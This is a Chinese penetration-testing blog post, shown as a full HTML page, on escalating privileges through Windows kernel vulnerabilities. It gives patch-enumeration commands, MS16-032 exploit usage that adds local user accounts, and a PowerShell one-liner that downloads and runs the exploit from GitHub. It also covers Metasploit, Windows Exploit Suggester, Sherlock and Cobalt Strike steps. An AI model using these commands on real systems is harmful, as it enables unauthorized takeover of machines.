<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.2.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.4/css/all.min.css" integrity="sha256-mUZM63G8m73Mcidfrv5E+Y61y7a12O5mW4ezU3bxqW4=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"sunian19.github.io","root":"/","images":"/images","scheme":"Gemini","darkmode":false,"version":"8.8.1","exturl":false,"sidebar":{"position":"right","display":"post","padding":18,"offset":12},"copycode":true,"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js"></script>
<meta name="description" content="常见提权方式有： 1、系统内核溢出漏洞提权 2、数据库提权 3、错误的系统配置提权 4、组策略首选项提权 5、web中间件漏洞提权 6、DLL劫持提权 7、滥用高权限令牌提权 8、第三方软件&#x2F;服务提权">
<meta property="og:type" content="article">
<meta property="og:title" content="&#39;内核溢出漏洞提权&#39;">
<meta property="og:url" content="https://sunian19.github.io/2020/04/02/%E5%86%85%E6%A0%B8%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E6%8F%90%E6%9D%83/index.html">
<meta property="og:site_name" content="zer0_c|imb&#39;s blog">
<meta property="og:description" content="常见提权方式有： 1、系统内核溢出漏洞提权 2、数据库提权 3、错误的系统配置提权 4、组策略首选项提权 5、web中间件漏洞提权 6、DLL劫持提权 7、滥用高权限令牌提权 8、第三方软件&#x2F;服务提权">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://sunian19.github.io/imgss/p43.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/a50.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/a51.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/p44.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/p45.png">
<meta property="article:published_time" content="2020-04-02T15:04:41.000Z">
<meta property="article:modified_time" content="2020-07-13T02:45:52.000Z">
<meta property="article:author" content="zer0_c|imb">
<meta property="article:tag" content="渗透测试">
<meta property="article:tag" content="提权">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://sunian19.github.io/imgss/p43.png">


<link rel="canonical" href="https://sunian19.github.io/2020/04/02/%E5%86%85%E6%A0%B8%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E6%8F%90%E6%9D%83/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://sunian19.github.io/2020/04/02/%E5%86%85%E6%A0%B8%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E6%8F%90%E6%9D%83/","path":"2020/04/02/内核溢出漏洞提权/","title":"'内核溢出漏洞提权'"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>'内核溢出漏洞提权' | zer0_c|imb's blog</title>
  

  <script src="/js/third-party/analytics/baidu-analytics.js"></script>
  <script async src="https://hm.baidu.com/hm.js?48584c486973b4bf025a425c3d7b4007"></script>



  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <h1 class="site-title">zer0_c|imb's blog</h1>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu">
        <li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li>
        <li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li>
        <li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li>
        <li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li>
        <li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#chang-jian-ti-quan-fang-shi-you"><span class="nav-number">1.</span> <span class="nav-text">常见提权方式有：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#li-yong-metasploit-fa-xian-que-shi-bu-ding"><span class="nav-number">2.</span> <span class="nav-text">利用Metasploit发现缺失补丁</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#windows-exploit-suggester"><span class="nav-number">3.</span> <span class="nav-text">Windows Exploit Suggester</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#powershell-zhong-de-sherlock-jiao-ben"><span class="nav-number">4.</span> <span class="nav-text">powershell中的Sherlock脚本</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="zer0_c|imb"
      src="/imgss/touxiang.jpg">
  <p class="site-author-name" itemprop="name">zer0_c|imb</p>
  <div class="site-description" itemprop="description">忘川河畔彼岸花，红如鲜血似朱砂</div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">88</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">16</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">39</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author site-overview-item animated">
      <span class="links-of-author-item">
        <a href="mailto:lingyu195@gmail.com" title="E-Mail → mailto:lingyu195@gmail.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
      <span class="links-of-author-item">
        <a href="tencent://AddContact/?fromId=45&fromSubId=1&subcmd=all&uin=3504078815" title="QQ → tencent:&#x2F;&#x2F;AddContact&#x2F;?fromId&#x3D;45&amp;fromSubId&#x3D;1&amp;subcmd&#x3D;all&amp;uin&#x3D;3504078815" rel="noopener" target="_blank"><i class="qq fa-fw"></i>QQ</a>
      </span>
  </div>


  <div class="links-of-blogroll site-overview-item animated">
    <div class="links-of-blogroll-title"><i class="fa fa-globe fa-fw"></i>
      友情链接
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="http://www.ch4ser.top/" title="http:&#x2F;&#x2F;www.ch4ser.top&#x2F;" rel="noopener" target="_blank">ch4ser</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://hackergu.com/" title="http:&#x2F;&#x2F;hackergu.com&#x2F;" rel="noopener" target="_blank">Gu</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://al0neranger.github.io/" title="https:&#x2F;&#x2F;al0neranger.github.io&#x2F;" rel="noopener" target="_blank">al0neranger</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://www.cnblogs.com/lyshark" title="https:&#x2F;&#x2F;www.cnblogs.com&#x2F;lyshark" rel="noopener" target="_blank">lyshark</a>
        </li>
    </ul>
  </div>

        </div>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://sunian19.github.io/2020/04/02/%E5%86%85%E6%A0%B8%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E6%8F%90%E6%9D%83/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/imgss/touxiang.jpg">
      <meta itemprop="name" content="zer0_c|imb">
      <meta itemprop="description" content="忘川河畔彼岸花，红如鲜血似朱砂">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="zer0_c|imb's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          '内核溢出漏洞提权'
        </h1>


        <div class="post-meta">
        
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2020-04-02 23:04:41" itemprop="dateCreated datePublished" datetime="2020-04-02T23:04:41+08:00">2020-04-02</time>
    </span>
      <span class="post-meta-item">
        <span class="post-meta-item-icon">
          <i class="far fa-calendar-check"></i>
        </span>
        <span class="post-meta-item-text">更新于</span>
        <time title="修改时间：2020-07-13 10:45:52" itemprop="dateModified" datetime="2020-07-13T10:45:52+08:00">2020-07-13</time>
      </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" itemprop="url" rel="index"><span itemprop="name">渗透测试</span></a>
        </span>
    </span>

  
    <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
</div>

        </div>

      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h3 id="chang-jian-ti-quan-fang-shi-you" id="常见提权方式有：">常见提权方式有：</h3>
<p>1、系统内核溢出漏洞提权<br>
2、数据库提权<br>
3、错误的系统配置提权<br>
4、组策略首选项提权<br>
5、web中间件漏洞提权<br>
6、DLL劫持提权<br>
7、滥用高权限令牌提权<br>
8、第三方软件/服务提权</p>
<a id="more"></a>
<blockquote>
<p>查看目标机上安装的补丁：<br>
systeminfo<br>
Wmic qfe get Caption,Description,HotFixID,InstalledOn<br>
查找指定补丁命令：<br>
Wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:“KB4537572”<br>
可以看到我这台机器上没有安装任何补丁<br>
<img src="/imgss/p43.png" alt=""></p>
</blockquote>
<blockquote>
<p>提权漏洞合集<br>
<a target="_blank" rel="noopener" href="https://github.com/SecWiki/windows-kernel-exploits">https://github.com/SecWiki/windows-kernel-exploits</a><br>
<a target="_blank" rel="noopener" href="https://github.com/SecWiki/linux-kernel-exploits">https://github.com/SecWiki/linux-kernel-exploits</a></p>
</blockquote>
<p>###利用手动执行命令发现缺失补丁</p>
<blockquote>
<p>如果目标机存在MS16-032(KB3139914)漏洞，那么攻击者不但可使用Metasploit进行攻击，还可使用powershell下的脚本进行提权，<a target="_blank" rel="noopener" href="https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1">https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1</a><br>
利用方法：<br>
将ps1脚本上传到目标机,指定以下命令创建用户为1，密码为1的账号<br>
. .\Invoke-MS16-032.ps1<br>
Invoke-MS16-032 -Application cmd.exe -Commandline “/c net user 1 1 /add”<br>
还可通过此脚本添加和执行任意程序<br>
Invoke-MS16-032 -Application notepas.exe<br>
远程下载、提权、添加用户<br>
powershell -nop -exec bypass -c “IEX(New-Object Net.WebClient).DownloadString(‘<a target="_blank" rel="noopener" href="https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1">https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1</a>’);Invoke-MS16-032 -Application cmd.exe -commandline ‘/c net user 2 test123 /add’”</p>
</blockquote>
<h3 id="li-yong-metasploit-fa-xian-que-shi-bu-ding" id="利用Metasploit发现缺失补丁">利用Metasploit发现缺失补丁</h3>
<blockquote>
<p>use post/windows/gather/enum_patches<br>
set session 1<br>
run</p>
</blockquote>
<h3 id="windows-exploit-suggester" id="Windows-Exploit-Suggester">Windows Exploit Suggester</h3>
<blockquote>
<p>下载链接https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git<br>
利用systeminfo命令获取当前系统补丁安装情况，将补丁信息导入patches.txt<br>
systeminfo &gt; patches.txt<br>
从微软官网更新漏洞数据库，会以Excel格式保存<br>
./windows-exploit-suggester.py --update<br>
安装xlrd模块<br>
pip install xlrd --upgrade<br>
检测系统中是否存在未修复的漏洞<br>
./windows-exploit-suggester.py -d 2020-02-02-msssb.xls -i patches.txt<br>
<img src="/imgss/a50.png" alt=""></p>
</blockquote>
<blockquote>
<p>利用Metasploit快速识别可能被利用的漏洞<br>
use post/multi/recon/local_exploit_suggester<br>
set LHOST 192.168.1.1<br>
set SESSION 12<br>
exploit<br>
<img src="/imgss/a51.png" alt=""></p>
</blockquote>
<h3 id="powershell-zhong-de-sherlock-jiao-ben" id="powershell中的Sherlock脚本">powershell中的Sherlock脚本</h3>
<blockquote>
<p>用于快速查找本地权限提升漏洞的脚本<br>
<a target="_blank" rel="noopener" href="https://github.com/rasta-mouse/Sherlock">https://github.com/rasta-mouse/Sherlock</a><br>
<img src="/imgss/p44.png" alt="漏洞列表"><br>
系统的shell环境中输入命令，调用脚本<br>
Import-Module .\Sherlock.ps1<br>
搜索漏洞列表中未安装补丁的<br>
Find-AllVulns<br>
<img src="/imgss/p45.png" alt=""><br>
搜索单个漏洞<br>
powershell Find-MS14058</p>
</blockquote>
<blockquote>
<p>CS3.6之后新增了elevate功能，可直接使用进行提权<br>
elevate ms14-058 smb<br>
getuid</p>
</blockquote>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" rel="tag"># 渗透测试</a>
              <a href="/tags/%E6%8F%90%E6%9D%83/" rel="tag"># 提权</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2020/04/01/SOCKS%E4%BB%A3%E7%90%86/" rel="prev" title="'SOCKS代理及数据压缩及上传和下载'">
                  <i class="fa fa-chevron-left"></i> 'SOCKS代理及数据压缩及上传和下载'
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2020/04/06/zimbra/" rel="next" title="'zimbra邮件自动导出脚本'">
                  'zimbra邮件自动导出脚本' <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">zer0_c|imb</span>
</div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_uv">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <script src="https://cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  
<script src="https://cdn.jsdelivr.net/npm/hexo-generator-searchdb@1.4.0/dist/search.js" integrity="sha256-vXZMYLEqsROAXkEw93GGIvaB2ab+QW6w3+1ahD9nXXA=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>





  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>





</body>
</html>
